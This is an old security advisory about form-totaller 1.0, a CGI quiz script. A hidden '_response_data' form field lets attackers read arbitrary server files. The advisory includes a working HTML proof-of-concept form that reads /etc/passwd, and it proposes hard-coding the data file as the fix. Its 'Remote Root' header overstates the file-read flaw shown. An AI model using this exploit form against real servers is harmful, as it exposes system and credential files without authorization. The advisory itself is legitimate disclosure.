Content-Type: Remote Root via vulnerible CGI software
Date        : 13/08/2000
Sender      : s1gnal_9 <s1gnal-9@vs-solutions.com>
Subject     : form-totaller Vulnerible CGI
X-System    : UNIX/NT systems running the form-totaller CGI software
X-Status    : s1gnal_9-ADVISORY-form-totaller.txt
X-Greets    : Narr0w, f0bic, VetesGirl
_________________________________________________________________________________


PRODUCT NAME:  form-totaller version 1.0

PRODUCT HOMEPAGE:  http://www.newbreedsoftware.com/form-totaller/
       Also Available at freecode.com 

DESCRIPTION :   
Use "form-totaller" to create tests and quizes on the web. 
Use forms with pull-down menus or radio buttons and this CGI will display 
output based on their input. 

PROBLEM:
The command field "_response_data" is the field that specifies the display output 
based on their input.  

The default file for this field is set at:
<input type="hidden" name="_response_data" value="responses.dat">
A remote attacker could easily change the cgi script to use "/etc/passwd" as the 
response data value. 


EXAMPLE:
Below is a example of how we could read files on the remote system.

<-------------------------CUT HERE-------------------------------------->
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">
<input type="hidden" name="_response_top" value="top.html">
<input type="hidden" name="_response_data" value="/etc/passwd">
<input type="hidden" name="_response_bottom" value="bottom.html">
<input type="hidden" name="_divide_by" value="4">
<input type="submit" value="Click for viewing of the /etc/passwd file.">
</form>
<-------------------------CUT HERE-------------------------------------->


SOLUTION
I would recommend hard-coding the response_data file right into the script 
and leave that command field out of the cgi.


Please visit www.zone.ee/unix :)